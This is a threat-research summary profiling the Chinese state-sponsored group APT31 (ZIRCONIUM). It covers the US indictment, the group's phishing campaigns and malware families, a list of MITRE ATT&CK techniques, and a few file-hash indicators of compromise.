Threat Research

Dark Web Profile: APT31 – SOCRadar® Cyber Intelligence Inc.

Securonix

APT31, also known as ZIRCONIUM or Judgment Panda, is a Chinese state-sponsored threat group engaged in cyber espionage and targeted intrusions. A US DOJ indictment outlines two-decade operations, front companies, malware usage, and mass spearphishing campaigns tied to China’s strategic objectives. #APT31 #ZIRCONIUM #JudgmentPanda #WuhanXRZ #EvilOSX #CobaltStrike

Keypoints

  • APT31 is a Chinese state-sponsored actor with ties to the Ministry of State Security and conducts espionage and targeted intrusions on a global scale.
  • The US Department of Justice indicted seven individuals linked to APT31 for conspiracy to commit computer intrusions and wire fraud, spanning roughly 14 years.
  • The group conducted more than 10,000 malicious emails with tracking links to harvest recipient data for subsequent attacks on networks, email, cloud storage, and call records.
  • APT31 employed a dual-phase approach: gather initial data from tracking emails, then execute direct hacking, including targeting family members and SOHO devices via home routers.
  • Early operations used malware families like RAWDOOR, Trochilus, EvilOSX, DropDoor/DropCat, then shifted to cracked versions of Cobalt Strike for persistence and access.
  • The indictment notes high-profile targeting (e.g., Hong Kong Umbrella Movement), a defense contractor subsidiary intrusion to reach core networks, and a combination of exploits (0-day privilege escalation, SQL injection).
  • Front companies such as Wuhan XRZ and support from Wuhan Liuhe were used to conceal operations; the group also relied on two-infection techniques to re-enter compromised networks.

MITRE Techniques

  • [T1583.001] Acquire Infrastructure: Domains – “ZIRCONIUM purchased domains for targeted campaigns.”
  • [T1583.006] Acquire Infrastructure: Web Services – “ZIRCONIUM used GitHub to host malware linked in spearphishing emails.”
  • [T1547.001] Boot or Logon Autostart Execution – “ZIRCONIUM created a Registry Run key for persistence with a malicious binary.”
  • [T1059.003] Command and Scripting Interpreter: Cmd – “ZIRCONIUM opened a Windows Command Shell on a remote host.”
  • [T1059.006] Command and Scripting Interpreter: Python – “ZIRCONIUM used Python-based implants for interaction with compromised hosts.”
  • [T1555.003] Credentials from Password Stores – “ZIRCONIUM stole credentials from web browsers.”
  • [T1140] Deobfuscate/Decode Files or Information – “ZIRCONIUM used AES256 decryption for exploit code.”
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – “ZIRCONIUM utilized AES encrypted communications in C2.”
  • [T1041] Exfiltration Over C2 Channel – “ZIRCONIUM exfiltrated files via the Dropbox API C2.”
  • [T1567.002] Exfiltration Over Web Service – “ZIRCONIUM exfiltrated data to Dropbox.”
  • [T1068] Exploitation for Privilege Escalation – “ZIRCONIUM exploited CVE-2017-0005 for local escalation.”
  • [T1105] Ingress Tool Transfer – “ZIRCONIUM downloaded malicious files to compromised hosts.”
  • [T1036.004] Masquerading: Masquerade Task or Service – “ZIRCONIUM used a run key for masking a persistence mechanism.”
  • [T1027.002] Obfuscated Files or Information: Packing – “ZIRCONIUM used multi-stage packers for exploit code.”
  • [T1566.002] Phishing: Spearphishing Link – “ZIRCONIUM used malicious links in emails for malware delivery.”
  • [T1598.003] Phishing for Information – “ZIRCONIUM targeted presidential campaign staffers with credential phishing emails.”
  • [T1012] Query Registry – “ZIRCONIUM queried the Registry for proxy settings.”
  • [T1218.007] System Binary Proxy Execution: Msiexec – “ZIRCONIUM used msiexec.exe for downloading and executing malicious MSI files.”
  • [T1082] System Information Discovery – “ZIRCONIUM captured processor architecture for C2 registration.”
  • [T1016] System Network Configuration Discovery – “ZIRCONIUM enumerated proxy settings.”
  • [T1033] System Owner/User Discovery – “ZIRCONIUM captured usernames for C2 registration.”
  • [T1124] System Time Discovery – “ZIRCONIUM captured system time for C2 registration.”
  • [T1204.001] User Execution: Malicious Link – “ZIRCONIUM used malicious links for malware downloads.”
  • [T1102.002] Web Service: Bidirectional Communication – “ZIRCONIUM used Dropbox for bidirectional C2 communication and execution of commands.”

Indicators of Compromise

  • [SHA-256 Hash] Latest IoCs – 74f7a3b2a5df81eb7b5e0c5c4af8548e61dc37c608dda458b75b58852f2f2cfd, f332a941d786148a35cec683edb965ea4bbd6ff6bd871880f30dc7d42b922443, and 10 more hashes

Read more: https://socradar.io/dark-web-profile-apt31/